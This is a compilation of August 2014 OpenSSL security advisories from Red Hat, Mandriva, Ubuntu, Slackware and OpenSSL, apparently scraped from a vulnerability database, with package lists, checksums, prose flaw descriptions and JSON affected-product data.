ppc64: openssl-debuginfo-1.0.1e-34.el7_0.4.ppc.rpm openssl-debuginfo-1.0.1e-34.el7_0.4.ppc64.rpm openssl-perl-1.0.1e-34.el7_0.4.ppc64.rpm openssl-static-1.0.1e-34.el7_0.4.ppc.rpm openssl-static-1.0.1e-34.el7_0.4.ppc64.rpm
s390x: openssl-debuginfo-1.0.1e-34.el7_0.4.s390.rpm openssl-debuginfo-1.0.1e-34.el7_0.4.s390x.rpm openssl-perl-1.0.1e-34.el7_0.4.s390x.rpm openssl-static-1.0.1e-34.el7_0.4.s390.rpm openssl-static-1.0.1e-34.el7_0.4.s390x.rpm
x86_64: openssl-debuginfo-1.0.1e-34.el7_0.4.i686.rpm openssl-debuginfo-1.0.1e-34.el7_0.4.x86_64.rpm openssl-perl-1.0.1e-34.el7_0.4.x86_64.rpm openssl-static-1.0.1e-34.el7_0.4.i686.rpm openssl-static-1.0.1e-34.el7_0.4.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 7):
Source: openssl-1.0.1e-34.el7_0.4.src.rpm
x86_64: openssl-1.0.1e-34.el7_0.4.x86_64.rpm openssl-debuginfo-1.0.1e-34.el7_0.4.i686.rpm openssl-debuginfo-1.0.1e-34.el7_0.4.x86_64.rpm openssl-devel-1.0.1e-34.el7_0.4.i686.rpm openssl-devel-1.0.1e-34.el7_0.4.x86_64.rpm openssl-libs-1.0.1e-34.el7_0.4.i686.rpm openssl-libs-1.0.1e-34.el7_0.4.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 7):
x86_64: openssl-debuginfo-1.0.1e-34.el7_0.4.i686.rpm openssl-debuginfo-1.0.1e-34.el7_0.4.x86_64.rpm openssl-perl-1.0.1e-34.el7_0.4.x86_64.rpm openssl-static-1.0.1e-34.el7_0.4.i686.rpm openssl-static-1.0.1e-34.el7_0.4.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/#package
- References:
https://www.redhat.com/security/data/cve/CVE-2014-3505.html https://www.redhat.com/security/data/cve/CVE-2014-3506.html https://www.redhat.com/security/data/cve/CVE-2014-3507.html https://www.redhat.com/security/data/cve/CVE-2014-3508.html https://www.redhat.com/security/data/cve/CVE-2014-3509.html https://www.redhat.com/security/data/cve/CVE-2014-3510.html https://www.redhat.com/security/data/cve/CVE-2014-3511.html https://access.redhat.com/security/updates/classification/#moderate https://www.openssl.org/news/secadv_20140806.txt
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2014 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iD8DBQFT69raXlSAg2UNWIIRAiQAAKCbp6Iou4mHuootBfgs0jm7zP/wWACgt50C pHXxupQnHYYH+zJFOmk5u8o= =DwUW -----END PGP SIGNATURE-----
-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce .
The updated packages have been upgraded to the 1.0.0n version where these security flaws has been fixed.
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3508 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3509 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3505 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3506 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3507 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3510 http://www.openssl.org/news/secadv_20140806.txt
Updated Packages:
Mandriva Business Server 1/X86_64: 17007f558e739eb863c8507d520ffbc9 mbs1/x86_64/lib64openssl1.0.0-1.0.0n-1.mbs1.x86_64.rpm f810bbe20b2de26cb99d13ddaf0ac2fa mbs1/x86_64/lib64openssl-devel-1.0.0n-1.mbs1.x86_64.rpm 54d87a61ca0440dc5f344931de1ff43e mbs1/x86_64/lib64openssl-engines1.0.0-1.0.0n-1.mbs1.x86_64.rpm 5b1748370e5a855cc31d3eec7673da5e mbs1/x86_64/lib64openssl-static-devel-1.0.0n-1.mbs1.x86_64.rpm 7e19a555629b4a2d3d4533be7786ce5e mbs1/x86_64/openssl-1.0.0n-1.mbs1.x86_64.rpm a9e74f2bab2878f601cfb44620c76dbb mbs1/SRPMS/openssl-1.0.0n-1.mbs1.src.rpm
To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. You can obtain the GPG public key of the Mandriva Security Team by executing:
gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
You can view other update advisories for Mandriva Linux at:
http://www.mandriva.com/en/support/security/advisories/
If you want to report vulnerabilities, please contact
security_(at)_mandriva.com
Type Bits/KeyID Date User ID
pub 1024D/22458A98 2000-07-10 Mandriva Security Team
iD8DBQFT5HsDmqjQ0CJFipgRAhA5AJ0ZoDe2+SA7K7xk+NZLedQBVoFVvgCffPW9 5geoq7aMnxbnw5eTuuH+iIs= =CK7e -----END PGP SIGNATURE----- . ============================================================================ Ubuntu Security Notice USN-2308-1 August 07, 2014
openssl vulnerabilities
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 14.04 LTS
- Ubuntu 12.04 LTS
- Ubuntu 10.04 LTS
Summary:
Several security issues were fixed in OpenSSL. This issue only affected Ubuntu 12.04 LTS and Ubuntu 14.04 LTS. When OpenSSL is used with certain applications, an attacker may use this issue to possibly gain access to sensitive information. This issue only affected Ubuntu 12.04 LTS and Ubuntu 14.04 LTS. This issue only affected Ubuntu 12.04 LTS and Ubuntu 14.04 LTS. This issue only affected Ubuntu 12.04 LTS and Ubuntu 14.04 LTS. This issue only affected Ubuntu 12.04 LTS and Ubuntu 14.04 LTS. (CVE-2014-5139)
Update instructions:
The problem can be corrected by updating your system to the following package versions:
Ubuntu 14.04 LTS: libssl1.0.0 1.0.1f-1ubuntu2.5
Ubuntu 12.04 LTS: libssl1.0.0 1.0.1-4ubuntu5.17
Ubuntu 10.04 LTS: libssl0.9.8 0.9.8k-7ubuntu8.20
After a standard system update you need to reboot your computer to make all the necessary changes.
Here are the details from the Slackware 14.1 ChangeLog: +--------------------------+ patches/packages/openssl-1.0.1i-i486-1_slack14.1.txz: Upgraded. ( Security fix ) +--------------------------+
Where to find the new packages: +-----------------------------+
Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-)
Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you.
Updated packages for Slackware 13.0: ftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/openssl-0.9.8zb-i486-1_slack13.0.txz ftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/openssl-solibs-0.9.8zb-i486-1_slack13.0.txz
Updated packages for Slackware x86_64 13.0: ftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/openssl-0.9.8zb-x86_64-1_slack13.0.txz ftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/openssl-solibs-0.9.8zb-x86_64-1_slack13.0.txz
Updated packages for Slackware 13.1: ftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/openssl-0.9.8zb-i486-1_slack13.1.txz ftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/openssl-solibs-0.9.8zb-i486-1_slack13.1.txz
Updated packages for Slackware x86_64 13.1: ftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/openssl-0.9.8zb-x86_64-1_slack13.1.txz ftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/openssl-solibs-0.9.8zb-x86_64-1_slack13.1.txz
Updated packages for Slackware 13.37: ftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/openssl-0.9.8zb-i486-1_slack13.37.txz ftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/openssl-solibs-0.9.8zb-i486-1_slack13.37.txz
Updated packages for Slackware x86_64 13.37: ftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/openssl-0.9.8zb-x86_64-1_slack13.37.txz ftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/openssl-solibs-0.9.8zb-x86_64-1_slack13.37.txz
Updated packages for Slackware 14.0: ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/openssl-1.0.1i-i486-1_slack14.0.txz ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/openssl-solibs-1.0.1i-i486-1_slack14.0.txz
Updated packages for Slackware x86_64 14.0: ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/openssl-1.0.1i-x86_64-1_slack14.0.txz ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/openssl-solibs-1.0.1i-x86_64-1_slack14.0.txz
Updated packages for Slackware 14.1: ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/openssl-1.0.1i-i486-1_slack14.1.txz ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/openssl-solibs-1.0.1i-i486-1_slack14.1.txz
Updated packages for Slackware x86_64 14.1: ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/openssl-1.0.1i-x86_64-1_slack14.1.txz ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/openssl-solibs-1.0.1i-x86_64-1_slack14.1.txz
Updated packages for Slackware -current: ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/a/openssl-solibs-1.0.1i-i486-1.txz ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/openssl-1.0.1i-i486-1.txz
Updated packages for Slackware x86_64 -current: ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/a/openssl-solibs-1.0.1i-x86_64-1.txz ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/openssl-1.0.1i-x86_64-1.txz
MD5 signatures: +-------------+
Slackware 13.0 packages: 30bdc015b10d8891b90d3f6ea34f5fdd openssl-0.9.8zb-i486-1_slack13.0.txz 3dc4140c22c04c94e5e74386a5a1c200 openssl-solibs-0.9.8zb-i486-1_slack13.0.txz
Slackware x86_64 13.0 packages: 3da32f51273762d67bf9dbcc91af9413 openssl-0.9.8zb-x86_64-1_slack13.0.txz 075e5d12e5b909ecac923cb210f83544 openssl-solibs-0.9.8zb-x86_64-1_slack13.0.txz
Slackware 13.1 packages: 3b7e2bb2b317bf72b8f9b2b7a14bddfb openssl-0.9.8zb-i486-1_slack13.1.txz 92af0784eade0674332a56bfab73b97d openssl-solibs-0.9.8zb-i486-1_slack13.1.txz
Slackware x86_64 13.1 packages: df5f961109d7b50971660ca6a7d4c48c openssl-0.9.8zb-x86_64-1_slack13.1.txz 582aaeae3d56730a2e1538a67d4e44da openssl-solibs-0.9.8zb-x86_64-1_slack13.1.txz
Slackware 13.37 packages: 546445d56d3b367fa0dd4e80859c4620 openssl-0.9.8zb-i486-1_slack13.37.txz b80e9df8cdd0649939ec2fab20d24691 openssl-solibs-0.9.8zb-i486-1_slack13.37.txz
Slackware x86_64 13.37 packages: 9c9ce97dc21340924a3e27c1a8047023 openssl-0.9.8zb-x86_64-1_slack13.37.txz 0fe1931f2fc82fb8d5fbe72680caf843 openssl-solibs-0.9.8zb-x86_64-1_slack13.37.txz
Slackware 14.0 packages: d1580f4b22b99cee42b22276653c8180 openssl-1.0.1i-i486-1_slack14.0.txz ec93cec2bcab8ae7391a504573cbc231 openssl-solibs-1.0.1i-i486-1_slack14.0.txz
Slackware x86_64 14.0 packages: 329475de3759225b1d02aa7317b2eb58 openssl-1.0.1i-x86_64-1_slack14.0.txz 25f2a198022d974534986a3913ca705c openssl-solibs-1.0.1i-x86_64-1_slack14.0.txz
Slackware 14.1 packages: 8336457bc31d44ebf502ffc4443f12f7 openssl-1.0.1i-i486-1_slack14.1.txz 4b99ac357fbd3065c53367eea246b8c7 openssl-solibs-1.0.1i-i486-1_slack14.1.txz
Slackware x86_64 14.1 packages: f2b8f81d9d7dc02e5d1011f663ccc95d openssl-1.0.1i-x86_64-1_slack14.1.txz 4360abffbb57cb18ba0720f782d78250 openssl-solibs-1.0.1i-x86_64-1_slack14.1.txz
Slackware -current packages: 49ecd332a899cf742d3467a6efe44269 a/openssl-solibs-1.0.1i-i486-1.txz 27da017c49045981b1793f105aff365f n/openssl-1.0.1i-i486-1.txz
Slackware x86_64 -current packages: 8d74f3d770802182137c84d925f58cbc a/openssl-solibs-1.0.1i-x86_64-1.txz fd9d94d3210f0aedf74959cb0887e2b8 n/openssl-1.0.1i-x86_64-1.txz
Installation instructions: +------------------------+
Upgrade the packages as root:
upgradepkg openssl-1.0.1i-i486-1_slack14.1.txz openssl-solibs-1.0.1i-i486-1_slack14.1.txz
+-----+
Slackware Linux Security Team http://slackware.com/gpg-key security@slackware.com
+------------------------------------------------------------------------+ | To leave the slackware-security mailing list: | +------------------------------------------------------------------------+ | Send an email to majordomo@slackware.com with this text in the body of | | the email message: | | | | unsubscribe slackware-security | | | | You will get a confirmation message back containing instructions to | | complete the process. Please do not reply to this email address. OpenSSL Security Advisory [6 Aug 2014] ========================================
Information leak in pretty printing functions (CVE-2014-3508)
A flaw in OBJ_obj2txt may cause pretty printing functions such as X509_name_oneline, X509_name_print_ex et al. to leak some information from the stack. Applications may be affected if they echo pretty printing output to the attacker. OpenSSL SSL/TLS clients and servers themselves are not affected.
Thanks to Ivan Fratric (Google) for discovering this issue. This issue was reported to OpenSSL on 19th June 2014.
The fix was developed by Emilia Käsper and Stephen Henson of the OpenSSL development team. This can be exploited through a Denial of Service attack.
OpenSSL 1.0.1 SSL/TLS client users should upgrade to 1.0.1i.
Thanks to Joonas Kuorilehto and Riku Hietamäki (Codenomicon) for discovering and researching this issue. This issue was reported to OpenSSL on 2nd July 2014.
The fix was developed by Stephen Henson of the OpenSSL core team.
OpenSSL 1.0.0 SSL/TLS client users should upgrade to 1.0.0n. OpenSSL 1.0.1 SSL/TLS client users should upgrade to 1.0.1i.
Thanks to Gabor Tyukasz (LogMeIn Inc) for discovering and researching this issue. This issue was reported to OpenSSL on 8th July 2014.
The fix was developed by Gabor Tyukasz.
Double Free when processing DTLS packets (CVE-2014-3505)
An attacker can force an error condition which causes openssl to crash whilst processing DTLS packets due to memory being freed twice. This can be exploited through a Denial of Service attack.
Thanks to Adam Langley and Wan-Teh Chang (Google) for discovering and researching this issue. This issue was reported to OpenSSL on 6th June 2014.
The fix was developed by Adam Langley. This can be exploited through a Denial of Service attack.
Thanks to Adam Langley (Google) for discovering and researching this issue. This issue was reported to OpenSSL on 6th June 2014.
The fix was developed by Adam Langley. This can be exploited through a Denial of Service attack.
Thanks to Adam Langley (Google) for discovering and researching this issue. This issue was reported to OpenSSL on 6th June 2014.
The fix was developed by Adam Langley.
OpenSSL DTLS anonymous EC(DH) denial of service (CVE-2014-3510)
OpenSSL DTLS clients enabling anonymous (EC)DH ciphersuites are subject to a denial of service attack. A malicious server can crash the client with a null pointer dereference (read) by specifying an anonymous (EC)DH ciphersuite and sending carefully crafted handshake messages.
OpenSSL 0.9.8 DTLS client users should upgrade to 0.9.8zb OpenSSL 1.0.0 DTLS client users should upgrade to 1.0.0n. OpenSSL 1.0.1 DTLS client users should upgrade to 1.0.1i.
Thanks to Felix Gröbert (Google) for discovering and researching this issue. This issue was reported to OpenSSL on 18th July 2014.
The fix was developed by Emilia Käsper of the OpenSSL development team.
OpenSSL 1.0.1 SSL/TLS server users should upgrade to 1.0.1i.
Thanks to David Benjamin and Adam Langley (Google) for discovering and researching this issue. This issue was reported to OpenSSL on 21st July 2014.
The fix was developed by David Benjamin.
SRP buffer overrun (CVE-2014-3512)
A malicious client or server can send invalid SRP parameters and overrun an internal buffer. Only applications which are explicitly set up for SRP use are affected.
Thanks to Sean Devlin and Watson Ladd (Cryptography Services, NCC Group) for discovering this issue. This issue was reported to OpenSSL on 31st July 2014.
The fix was developed by Stephen Henson of the OpenSSL core team.
References
URL for this Security Advisory: https://www.openssl.org/news/secadv_20140806.txt
Note: the online version of the advisory may be updated with additional details over time
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201408-0089", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "0.9.8k" }, { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "0.9.8j" }, { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "0.9.8c" }, { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "1.0.1" }, { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "0.9.8h" }, { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "1.0.1h" }, { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "0.9.8g" }, { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "0.9.8i" }, { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "0.9.8f" }, { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "0.9.8l" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0l" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8a" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8u" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8v" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8b" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0f" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0d" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8t" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8o" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8s" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8x" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0k" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1b" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8q" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0j" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8m" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0e" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8d" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1a" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0h" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1d" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8e" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1f" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8n" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8y" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0i" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8za" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0m" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1e" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0c" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0b" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8p" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1g" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8r" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1c" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0g" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0a" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8w" }, { "model": "openssl", "scope": "lt", "trust": 0.8, "vendor": "openssl", "version": "0.9.8 thats all 0.9.8zb" }, { "model": "openssl", "scope": "lt", "trust": 0.8, "vendor": "openssl", "version": "1.0.0 thats all 1.0.0n" }, { "model": "openssl", "scope": "lt", "trust": 0.8, "vendor": "openssl", "version": "1.0.1 thats all 1.0.1i" }, { "model": "hp virtual connect", "scope": "lt", "trust": 0.8, "vendor": "hewlett packard", "version": "8gb 24 port fiber channel module 3.00 (vc ( virtual connect ) 4.40 )" }, { "model": "security network intrusion prevention system gx7412-05", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.1" }, { "model": "-stable", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.1.1" }, { "model": "aura collaboration environment", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "3.0" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "31005.1" }, { "model": "upward integration modules for vmware vsphere", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.5" }, { "model": "security network intrusion prevention system gx5108-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.2" }, { "model": "8.4-release-p12", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "big-ip wom hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "security network intrusion prevention system gx5208-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6" }, { "model": "flex system fc3171 8gb san pass-thru", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.3" }, { "model": "security network intrusion prevention system gx4004", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4" }, { "model": "10.0-beta", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "upward integration modules scvmm add-in", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "1.0.3" }, { "model": "-release-p2", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "7.1" }, { "model": "virtual connect 8gb 24-port fc module", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "3.0" }, { "model": "project openssl 0.9.8f", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "alpha", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.0" }, { "model": "tivoli netcool system service monitor fp1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "enterprise linux server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "big-ip aam", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5" }, { "model": "-releng", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.11" }, { "model": "9.1-stable", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "big-ip afm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "project openssl 1.0.0d", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "8.4-release-p15", "scope": "ne", "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "2.2.8" }, { "model": "project openssl 1.0.1e", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "security network intrusion prevention system gx5008", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5" }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.0" }, { "model": "big-ip apm hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "i v5r4", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "-stable", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.3" }, { "model": "project openssl beta3", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0.1" }, { "model": "big-ip webaccelerator hf7", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.6.0" }, { "model": "project openssl 0.9.8u", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0" }, { "model": "security network intrusion prevention system gx5108-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.1" }, { "model": "project openssl 1.0.1a", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "7.1" }, { "model": "project openssl b", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.0" }, { "model": "8.1-stable", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "oncommand unified manager core package", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3.0" }, { "model": "-release", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.5" }, { "model": "9.2-release-p11", "scope": "ne", "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "project openssl k", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "security network intrusion prevention system gx3002", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.2" }, { "model": "i v5r3", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "proventia network security controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.470" }, { "model": "security network intrusion prevention system gx5008", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2.0.0" }, { "model": "project openssl 1.0.0g", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "enterprise linux workstation", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "virtual connect 8gb 24-port fc module", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.0" }, { "model": "big-ip afm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.6.0" }, { "model": "linux amd64", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "clustered data ontap antivirus connector", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.3" }, { "model": "tivoli netcool/reporter", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "-release", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "3.5.1" }, { "model": "vios fp-25 sp-02", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.4" }, { "model": "9.1-release-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "8.3-release-p16", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, 